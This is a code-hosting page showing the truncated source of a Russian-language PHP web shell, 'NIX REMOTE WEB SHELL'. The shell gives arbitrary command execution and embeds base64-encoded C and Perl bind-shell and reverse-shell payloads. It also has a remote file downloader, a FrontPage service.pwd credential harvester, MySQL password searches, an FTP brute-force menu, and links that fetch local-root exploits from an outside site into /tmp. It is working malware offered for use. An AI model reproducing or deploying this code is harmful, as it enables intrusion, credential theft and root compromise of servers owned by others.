PageRenderTime 8ms CodeModel.GetById 4ms app.highlight 5ms RepoModel.GetById 1ms app.codeStats 0ms

/xakep-shells/PHP/nixrem.php.php.txt

https://github.com/chickenlove/webshell
Plain Text | 1772 lines | 1602 code | 170 blank | 0 comment | 0 complexity | d9e10daa08c908b3431cb30e74b7e6b4 MD5 | raw file

Large files files are truncated, but you can click here to view the full file

   1<?php
   2#########################################################
   3#                 NIX REMOTE WEB SHELL                  #
   4#       Coded by DreAmeRz          Ver 1.0              # 
   5#      ORIGINAL E-MAIL IS: dreamerz@mail.ru             #
   6#                               
   7#########################################################
   8$name="1";	// логин пользователя
   9$pass="1";	// пароль пользователя
  10if (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || $HTTP_SERVER_VARS['PHP_AUTH_USER']!=$name || $HTTP_SERVER_VARS['PHP_AUTH_PW']!=$pass)
  11   {
  12   header("WWW-Authenticate: Basic realm=\"AdminAccess\"");
  13   header("HTTP/1.0 401 Unauthorized");
  14   exit("Access Denied");
  15   }
  16?>
  17<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
  18<html>
  19<head>
  20<title>NIX REMOTE WEB-SHELL v.1.0</title>
  21<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
  22<meta http-equiv="pragma" content="no-cache">
  23<meta http-equiv="Content-Language" content="en,ru"> 
  24<META name="autor" content="DreAmeRz (www.Ru24-Team.NET)">
  25<style type="text/css">
  26BODY, TD, TR {
  27text-decoration: none;
  28font-family: Verdana;
  29font-size: 8pt;
  30scrollbar-face-color: #FFFFFF;
  31scrollbar-shadow-color:#000000 ;
  32scrollbar-highlight-color:#FFFFFF;
  33scrollbar-3dlight-color: #000000;
  34scrollbar-darkshadow-color:#FFFFFF ;
  35scrollbar-track-color: #FFFFFF;
  36scrollbar-arrow-color: #000000;
  37}
  38input, textarea, select {
  39font-family: Verdana;
  40font-size: 10px;
  41color: black;
  42background-color: red;
  43border: solid 1px;
  44border-color: black
  45}
  46UNKNOWN {
  47COLOR: black;
  48TEXT-DECORATION: none
  49}
  50A:link {COLOR:black; TEXT-DECORATION: none}
  51A:visited { COLOR:black; TEXT-DECORATION: none}
  52A:active {COLOR:black; TEXT-DECORATION: none}
  53A:hover {color:blue;TEXT-DECORATION: none}
  54</STYLE>
  55</HEAD>
  56
  57
  58<BODY bgcolor="#fffcf9" text="#000000">
  59<P align=center>[ <A href="javascript:history.next(+1)">Вперед ] </A><B><FONT color=#cccccc size=4>*.NIX REMOTE WEB-SHELL</FONT></B>
  60v.1.0<FONT color=#linux size=1> Stable </FONT> [ <A href="javascript:history.back(-1)">Назад ]</A>[ <A href="?ac=about" title='Что умеет скрипт...'>О скрипте ]</a><BR>
  61<A href="?ac=info" title='Узнай все об этой системе!'>[ Информация о системе</A> ][ <A href="?ac=navigation" title='Удобная графическая навигация. Просмотр, редактирование...'>Навигация</A> ][ <A href="?ac=backconnect" title='Установка backconnect и обычного бекдора '>Установка
  62бекдора</A> ][ <A href="?ac=eval" title='Создай свой скрипт на php прямо здесь :)'>PHP-код</A> ][ <A href="?ac=upload" title='Загрузка одного файла, масcовая загрузка, загрузка файлов с удаленного компьютера!'>Загрузка файлов</A> ][ <A href="?ac=shell" title='bash shell, альясы...'>Исполнение
  63команд ]</A> <br><A href="?ac=sql" title='Работа с MySQL'> [ MySQL</A> ]<A href="?ac=sendmail" title='Отправь е-mail отсюда!'>[ Отправка письма</A> ][ <A href="?ac=mailfluder" title='Тебя кто-то достал? Тогда тебе сюда...'>Маилфлудер</A>
  64 ][ <A href="?ac=tools" title='Кодировщики/декодировщики md5, des, sha1, base64... '>Инструменты ]</A>[ <A href="?ac=ps" title='Отображает список процессов на сервере и позволяет их убивать!'>Демоны</A> ][ <A href="?ac=art" title='Альтернативные методы взлома...'>Альтернативные методы</A> ][ <A href="?ac=exploits" title='id=root gid=0 uid=0'>/root</A> ][ <A href="?ac=selfremover" title='Надоел этот сервер? Тогда можно удалить и шелл...'>Удалить шелл</A> ]</P>
  65<?php
  66if (ini_get('register_globals') != '1') {
  67
  68  if (!empty($HTTP_POST_VARS))
  69    extract($HTTP_POST_VARS);
  70
  71  if (!empty($HTTP_GET_VARS))
  72    extract($HTTP_GET_VARS);
  73  if (!empty($HTTP_SERVER_VARS))
  74    extract($HTTP_SERVER_VARS);
  75}
  76Error_Reporting(E_COMPILE_ERROR|E_ERROR|E_CORE_ERROR);
  77set_magic_quotes_runtime(0);
  78set_time_limit(0);		// убрать ограничение по времени
  79ignore_user_abort(1);	// игнорировать разрыв связи с браузером
  80error_reporting(0);
  81$self = $_SERVER['PHP_SELF'];
  82$docr = $_SERVER['DOCUMENT_ROOT'];
  83$sern = $_SERVER['SERVER_NAME'];
  84if (($_POST['dir']!=="") AND ($_POST['dir'])) { chdir($_POST['dir']); }
  85$aliases=array(
  86'------------------------------------------------------------------------------------' => 'ls -la;pwd;uname -a',
  87'поиск на сервере всех файлов со suid-битом' => 'find / -type f -perm -04000 -ls',
  88'поиск на сервере всех файлов со sgid-битом' => 'find / -type f -perm -02000 -ls',
  89'поиск в текущей директории всех файлов со sgid-битом' => 'find . -type f -perm -02000 -ls',
  90'поиск на сервере файлов config' => 'find / -type f -name "config*"',
  91'поиск на сервере файлов admin' => 'find / -type f -name "admin*"',
  92'поиск в текущей директории файлов config' => 'find . -type f -name "config*"',
  93'поиск в текущей директории файлов pass' => 'find . -type f -name "pass*"',
  94'поиск на сервере всех директорий и файлов, открытых для записи' => 'find / -perm -2 -ls',
  95'поиск в текущей директории всех директорий и файлов, открытых для записи' => 'find . -perm -2 -ls',
  96'поиск в текущей директории файлов service.pwd' => 'find . -type f -name service.pwd',
  97'поиск на сервере файлов service.pwd' => 'find / -type f -name service.pwd',
  98'поиск на сервере файлов .htpasswd' => 'find / -type f -name .htpasswd',
  99'поиск в текущей директории файлов .htpasswd' => 'find . -type f -name .htpasswd',
 100'поиск всех файлов .bash_history' => 'find / -type f -name .bash_history',
 101'поиск в текущей директории файлов .bash_history' => 'find . -type f -name .bash_history',
 102'поиск всех файлов .fetchmailrc' => 'find / -type f -name .fetchmailrc',
 103'поиск в текущей директории файлов .fetchmailrc' => 'find . -type f -name .fetchmailrc',
 104'вывод списка атрибутов файлов на файловой системе ext2fs' => 'lsattr -va',
 105'просмотр открытых портов' => 'netstat -an | grep -i listen',
 106'поиск всех php-файлов со словом password' =>'find / -name *.php | xargs grep -li password',
 107'поиск папок с модом 777' =>'find / -type d -perm 0777',
 108'Определение версии ОС' =>'sysctl -a | grep version',
 109'Определение версии ядра' =>'cat /proc/version',
 110'Просмотр syslog.conf' =>'cat /etc/syslog.conf',
 111'Просмотр Message of the day' =>'cat /etc/motd',
 112'Просмотр hosts' =>'cat /etc/hosts',
 113'Версия дистрибутива 1' =>'cat /etc/issue.net',
 114'Версия дистрибутива 2' =>'cat /etc/*-realise',
 115'Показать все процесы' =>'ps auxw',
 116'Процессы текущего пользователя' =>'ps ux',
 117'Поиск httpd.conf' =>'locate httpd.conf');
 118
 119
 120
 121/* Port bind source */
 122$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5
 123jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5
 124ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW5
 1250IGFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnV
 126mWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0
 127KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyh
 128hdG9pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0F
 129OWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2N
 130rZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2F
 131kZHIgKikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB
 1327DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHV
 133wMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ
 1346IiwxMCk7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyh
 135hcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byByNTcgc2hlbGwgJiYgL2J
 136pbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGN
 137sb3NlKG5ld2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW5
 1380ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVudGVyZWQpO2krKykgDQp7DQppZih
 139lbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID0
 1409ICdccicpDQplbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCk
 141pDQpyZXR1cm4gMDsNCn0=";
 142
 143$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZi
 144AoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMSVNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2
 145NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORV
 146QsJlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQ
 147pzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZH
 148JfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw
 1490KbGlzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCm
 150FjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspKQ0Kew0KZGllICJDYW5ub3QgZm9yayIgaW
 151YgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+Jk
 152NPTk4iOw0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ0
 1539OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3NlIENPTk47DQpleGl0IDA7DQp9DQp9";
 154
 155$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ
 156HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ
 157DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ
 158HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L
 159CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd
 160GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka
 161WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO
 162iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR
 163VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK
 164FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
 165
 166$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0
 167KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10
 168pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJ
 169ybSAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2l
 170uLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA
 1719IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMSt
 172zdHJsZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVB
 173QUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4
 174sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCg
 175pIik7DQogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1
 176zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWN
 177sKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
 178
 179if(isset($uploadphp))
 180{
 181$socket=fsockopen($iphost,$loadport);					//connect
 182fputs($socket,"GET $loadfile HTTP/1.0\nHOST:cd\n\n");	//request
 183while(fgets($socket,31337)!="\r\n" && !feof($socket)) {
 184unset($buffer); }
 185while(!feof($socket)) $buffer.=fread($socket, 1024);
 186$file_size=strlen($buffer);
 187$f=fopen($loadnewname,"wb+");
 188fwrite($f, $buffer, $file_size);
 189echo "Размер загруженного файла: $file_size <b><br><br>" ;
 190}
 191
 192if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
 193elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
 194else {$ac = "navigation";}
 195
 196
 197
 198switch($ac) {
 199
 200// Shell
 201case "shell":
 202echo "<SCRIPT LANGUAGE='JavaScript'>
 203<!--
 204function pi(str) {
 205	document.command.cmd.value = str;
 206	document.command.cmd.focus();
 207}
 208//-->
 209</SCRIPT>";
 210
 211/* command execute */
 212if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -lad"; }
 213
 214if (($_POST['alias']) AND ($_POST['alias']!==""))
 215 {
 216 foreach ($aliases as $alias_name=>$alias_cmd) {
 217                                               if ($_POST['alias'] == $alias_name) {$_POST['cmd']=$alias_cmd;}
 218                                               }
 219 }
 220
 221
 222echo "<font face=Verdana size=-2>Выполненная команда: <b>".$_POST['cmd']."</b></font></td></tr><tr><td>";
 223echo "<b>";
 224echo "<div align=center><textarea name=report cols=145 rows=20>";
 225echo "".passthru($_POST['cmd'])."";
 226echo "</textarea></div>";
 227echo "</b>";
 228?>
 229</td></tr>
 230
 231<tr><b><div align=center>:: Выполнение команд на сервере ::</div></b></font></td></tr>
 232<tr><td height=23>
 233<TR>
 234	<CENTER>
 235 <TD><A HREF="JavaScript:pi('cd ');" class=fcom>| cd</A> |</TD>
 236	<TD><A HREF="JavaScript:pi('cat ');" class=fcom>| cat</A> |</TD>
 237	<TD><A HREF="JavaScript:pi('echo ');" class=fcom>echo</A> |</TD>
 238	<TD><A HREF="JavaScript:pi('wget ');" class=fcom>wget</A> |</TD>
 239	<TD><A HREF="JavaScript:pi('rm ');" class=fcom>rm</A> |</TD>
 240	<TD><A HREF="JavaScript:pi('mysqldump ');" class=fcom>mysqldump</A> |</TD>
 241	<TD><A HREF="JavaScript:pi('who');" class=fcom>who</A> |</TD>
 242	<TD><A HREF="JavaScript:pi('ps -ax');" class=fcom>ps -ax</A> |</TD>
 243  <TD><A HREF="JavaScript:pi('cp ');" class=fcom>cp</A> |</TD>
 244  <TD><A HREF="JavaScript:pi('pwd');" class=fcom>pwd</A> |</TD>
 245 <TD><A HREF="JavaScript:pi('perl  ');" class=fcom>perl</A> |</TD>
 246 <TD><A HREF="JavaScript:pi('gcc ');" class=fcom>gcc</A> |</TD>
 247 <TD><A HREF="JavaScript:pi('locate ');" class=fcom>locate</A> |</TD>
 248  <TD><A HREF="JavaScript:pi('find ');" class=fcom>find</A> |</TD>
 249  <TD><A HREF="JavaScript:pi('ls -lad');" class=fcom>ls -lad</A> |</TD>
 250       </CENTER>           	
 251</TR>
 252
 253<?
 254/* command execute form */
 255echo "<form name=command method=post>";
 256
 257echo "<b>Выполнить команду</b>";
 258echo "<input type=text name=cmd size=85><br>";
 259echo "<b>Рабочая директория &nbsp;</b>";
 260if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=text name=dir size=85 value=".exec("pwd").">"; }
 261else { echo "<input type=text name=dir size=85 value=".$_POST['dir'].">"; }
 262echo "<input type=submit name=submit value=Выполнить>";
 263
 264echo "</form>";
 265
 266/* aliases form */
 267echo "<form name=aliases method=POST>";
 268echo "<font face=Verdana size=-2>";
 269echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Выберите алиас<font face=Wingdings color=gray></font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
 270echo "<select name=alias>";
 271foreach ($aliases as $alias_name=>$alias_cmd)
 272 {
 273 echo "<option>$alias_name</option>";
 274 }
 275 echo "</select>";
 276if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
 277else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
 278echo "&nbsp;&nbsp;<input type=submit name=submit value=Выполнить>";
 279echo "</font>";
 280echo "</form>";
 281
 282
 283break;
 284case "art":
 285echo "<a href='?ac=frontpage'><b>FrontPage Exploit by Nitrex</b></a><br>
 286Эксплойт для FrontPage. Собирает читаемые .htpassword файлы по всему серверу. Позволяет создать нехилую базу всех сайтов в виде логин:пароль от хостера, то есть пароли к FrontPage подходят к FTP и другим сервисам сервера. Рассшифровка производится с помощью John The Ripper (Standart/DES).<br><br>
 287<a href='?ac=dbexploit'><b>MySQL Find Config Exploit by DreAmeRz</b></a><br>
 288Эксплоит, позволяющий облегчить поиск паролей к базе данных. Производится поиск файлов с упоминанием ряда строк, указывающих на коннект к MySQL. Также возможно совпадение паролей с другими сервисами сервера. Пароли в большенстве случаев или вовсе не зашифрованы, или зашифрованы обратимым алгоритмом. Проанализировав файлы, указанные эксплоитом, вы быстро найдете пароль к MySQL.<br><br>
 289<a href='?ac=ftp'><b>FTP Brut by xoce</b></a><br>
 290Полноценный брутфорсер, работающий по методу подстановки паролей, которые берет из файла. Файл генерируется сам, вы только указываете число паролей и... все - перебор начинается!!! С помощью данного брутфорсера вы сможете подобрать пароль к любому хостингу без проблем! Чтобы было что перебирать, была добавлена база паролей, которая генерируется на лету (не пишите большие цифры в количестве паролей, так как это серьезная нагрузка на сервер! 10000 вполне хватит).<br><br>
 291<a href='?ac=ftppass'><b>FTP login:login Brut by Terabyte</b></a><br>
 292Эксплоит позволяет перебрать аккаунт на FTP на связку login:login. Чем больше юзеров в /etc/passwd, тем больше вероятность удачной работы эксплоита.<br><br>
 293<a href='?ac=shell'><b>Некоторые другие мини-эксплоиты приведены здесь в альясах.</b></a><br>";
 294break;
 295case "frontpage":
 296$p=getenv("DOCUMENT_ROOT");
 297if(exec("cat /etc/passwd")){
 298$ex=explode("/", $p);
 299$do_login=substr($p,0,strpos($p,$ex[2]));
 300$next_login=substr($p,strpos($p,$ex[2])+strlen($ex[2]));
 301exec("cat /etc/passwd", $passwd);
 302for($i=0; $i<=count($passwd); $i++) {
 303$xz=explode(":", $passwd[$i]);
 304$file="/".$do_login.$xz[0].$next_login."/_vti_pvt/service.pwd";
 305if(exec("cat ".$file)){
 306exec("cat ".$file,$open);
 307$a=$open[count($open)-1];
 308$fr=strpos($a, ":");
 309$open1=substr($a, $fr);
 310if($xz[4]=='') {
 311$file1="/".$do_login.$xz[0].$next_login."/_vti_pvt/.htaccess";
 312Unset($domain);
 313exec("cat ".$file1,$domain);
 314$domain1=explode(" ",$domain[8]);
 315$xz[4]=$domain1[1];
 316}
 317echo $xz[0].$open1.":".$xz[2].":".$xz[3].":".$xz[4].":".$xz[5].":".$xz[6]."<br>";
 318} } 
 319}
 320elseif(is_file("/etc/passwd")){
 321$ex=explode("/", $p);
 322$passwd="/etc/passwd";
 323echo "Путь:&nbsp".$p."<br>"; 
 324$do_login=substr($p,0,strpos($p,$ex[2]));
 325$next_login=substr($p,strpos($p,$ex[2])+strlen($ex[2]));
 326if(is_file($passwd)) {
 327$open=fopen($passwd,"r");
 328while (!feof($open)) {
 329$str=fgets($open, 100);
 330$mas=explode(":", $str);
 331$file="/".$do_login.$mas[0]."/".$next_login."/_vti_pvt/service.pwd";
 332if(is_file($file)) {
 333echo $mas[0];
 334$open1=fopen($file, "r");
 335$str1=fread($open1,filesize($file));
 336fclose($open1);
 337$fr=strpos($str1, ":");
 338$str2=substr($str1, $fr);
 339$str2=rtrim($str2);
 340//
 341if($mas[4]=='') {
 342$file1="/".$do_login.$mas[0]."/".$next_login."/_vti_pvt/.htaccess";
 343$open2=fopen($file1,"r");
 344$domain=fread($open2,filesize($file1));
 345fclose($open2);
 346$domain1=substr($domain,106,110);
 347$domain2=explode("AuthUserFile",$domain1);
 348$mas[4]=$domain2[0];
 349}
 350//
 351echo $str2.":".$mas[2].":".$mas[3].":".$mas[4].":".$mas[5].":".$mas[6]."<br>";
 352}
 353} 
 354fclose($open);
 355}
 356}
 357else{
 358echo "С пассом облом :(((";
 359}
 360break;
 361case "dbexploit":
 362echo "<PRE>";
 363echo "<b>В файле присутствует функция mysql_connect: </b><br>";
 364exec("find / -name *.php | xargs grep -li mysql_connect");
 365exec("find / -name *.inc | xargs grep -li mysql_connect");
 366exec("find / -name *.inc.php | xargs grep -li mysql_connect");
 367echo "<b>В файле присутствует функция mysql_select_db: </b><br>";
 368exec("find / -name *.php | xargs grep -li mysql_select_db");
 369exec("find / -name *.inc | xargs grep -li mysql_select_db");
 370exec("find / -name *.inc.php | xargs grep -li mysql_select_db");
 371echo "<b>В файле присутствует упоминание пароля: </b><br>";
 372exec("find / -name *.php | xargs grep -li $password");
 373exec("find / -name *.inc | xargs grep -li $password");
 374exec("find / -name *.inc.php | xargs grep -li $password");
 375exec("find / -name *.php | xargs grep -li $pass");
 376exec("find / -name *.inc | xargs grep -li $pass");
 377exec("find / -name *.inc.php | xargs grep -li $pass");
 378echo "<b>В файле присутствует слово localhost: </b><br>";
 379exec("find / -name *.php | xargs grep -li localhost");
 380exec("find / -name *.inc | xargs grep -li localhost");
 381exec("find / -name *.inc.php | xargs grep -li localhost");
 382echo "</PRE>"; 
 383break;
 384// список процессов
 385case "ps":
 386echo "<b>Процессы в системе:</b><br>";
 387 
 388  echo "<br>";
 389  if ($pid)
 390  {
 391   if (!$sig) {$sig = 9;}
 392   echo "Отправление команды ".$sig." to #".$pid."... ";
 393   $ret = posix_kill($pid,$sig);
 394   if ($ret) {echo "Все, процесс убит, аминь";}
 395   else {echo "ОШИБКА! ".htmlspecialchars($sig).", в процессе #".htmlspecialchars($pid).".";}
 396  }
 397  $ret = `ps -aux`;
 398  if (!$ret) {echo "Невозможно отобразить список процессов! Видно, злой админ запретил ps";}
 399  else
 400  {
 401   $ret = htmlspecialchars($ret);
 402   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
 403   $stack = explode("\n",$ret);
 404   $head = explode(" ",$stack[0]);
 405   unset($stack[0]);
 406   if (empty($ps_aux_sort)) {$ps_aux_sort = $sort_default;}
 407   if (!is_numeric($ps_aux_sort[0])) {$ps_aux_sort[0] = 0;}
 408   $k = $ps_aux_sort[0];
 409   if ($ps_aux_sort[1] != "a") {$y = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$k."a\"></a>";}
 410   else {$y = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$k."d\"></a>";}
 411   for($i=0;$i<count($head);$i++)
 412   {
 413    if ($i != $k) {$head[$i] = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$i.$ps_aux_sort[1]."\"><b>".$head[$i]."</b></a>";}
 414   }
 415   $prcs = array();
 416   foreach ($stack as $line)
 417   {
 418    if (!empty($line))
 419	{
 420	 echo "<tr>";
 421     $line = explode(" ",$line);
 422     $line[10] = join(" ",array_slice($line,10,count($line)));
 423     $line = array_slice($line,0,11);
 424     $line[] = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
 425     $prcs[] = $line;
 426     echo "</tr>";
 427    }
 428   }
 429   $head[$k] = "<b>".$head[$k]."</b>".$y;
 430   $head[] = "<b>ACTION</b>";
 431   $v = $ps_aux_sort[0];
 432   usort($prcs,"tabsort");
 433   if ($ps_aux_sort[1] == "d") {$prcs = array_reverse($prcs);}
 434   $tab = array();
 435   $tab[] = $head;
 436   $tab = array_merge($tab,$prcs);
 437   echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=white borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
 438   foreach($tab as $k)
 439   {
 440    echo "<tr>";
 441    foreach($k as $v) {echo "<td>".$v."</td>";}
 442    echo "</tr>";
 443   }
 444   echo "</table>";
 445  }
 446break;
 447// exploits for root...
 448case "exploits":
 449// thanks to xoce
 450$public_site = "http://hackru.info/adm/exploits/public_exploits";
 451$private_site = "http://hackru.info/adm/exploits/private_exploits";
 452echo"Этот раздел создан по ряду причин. Во-первых, уже надоело искать одни и теже эксплоиты, во-вторых - компилирование и исправление сорцов под конкретную платформу уже тоже не приносит удовольствия. Все эксплоиты скомпилированы и настроены. Самому компилировать было влом, поэтому воспользовался готовыми :) Выражаю благодарность xoce (hackru.info)<br><br>
 453<a href='?ac=upload&file3=$public_site/m&file2=/tmp'>Local ROOT for linux 2.6.20 - mremap (./m)</a><br>
 454<a href='?ac=upload&file3=$public_site/p&file2=/tmp'>Local ROOT for linux 2.6.20 - ptrace (./p)</a><br>
 455<a href='?ac=upload&file3=$private_site/brk&file2=/tmp'>BRK - Local Root Unix 2.4.*(./brk)</a><br>
 456<a href='?ac=upload&file3=$private_site/sortrace&file2=/tmp'>Traceroute v1.4a5 exploit by sorbo (./sortrace)</a><br>
 457<a href='?ac=upload&file3=$private_site/root&file2=/tmp'>Local Root Unix 2.4.* (./root)</a><br>
 458<a href='?ac=upload&file3=$private_site/sxp&file2=/tmp'>Sendmail 8.11.x exploit localroot (./sxp)</a><br>
 459<a href='?ac=upload&file3=$private_site/ptrace_kmod&file2=/tmp'>Local Root Unix 2.4.* (./ptrace_kmod)</a><br>
 460<a href='?ac=upload&file3=$private_site/mr1_a&file2=/tmp'>Local Root Unix 2.4.* (./mr1_a)</a><br><br>";
 461echo "Использование: заходите в /tmp из bash шелла и запускайте файлы запуска.<br>
 462Пример: cd /tmp; ./m - все, эксплоит запустится, и если все ok, то вы получите права root'a!<br>
 463Если здесь не оказалось подходящего эксплоита, то посетите <a href=http://www.web-hack.ru/exploits/>www.web-hack.ru/exploits/</a> и <a href=http://security.nnov.ru>security.nnov.ru</a>.";
 464
 465break;
 466case "damp":
 467
 468  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
 469  if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){
 470  $db = @mysql_connect('localhost',$_POST['mysql_l'],$_POST['mysql_p']);
 471  if($db)
 472   {
 473
 474   if(@mysql_select_db($_POST['mysql_db'],$db))
 475    {
 476     // инфа о дампе
 477     $sql1  = "# MySQL dump created by NRWS\r\n";
 478     $sql1 .= "# homepage: http://www.Ru24-Team.NET\r\n";
 479     $sql1 .= "# ---------------------------------\r\n";
 480     $sql1 .= "#     date : ".date ("j F Y g:i")."\r\n";
 481     $sql1 .= "# database : ".$_POST['mysql_db']."\r\n";
 482     $sql1 .= "#    table : ".$_POST['mysql_tbl']."\r\n";
 483     $sql1 .= "# ---------------------------------\r\n\r\n";
 484
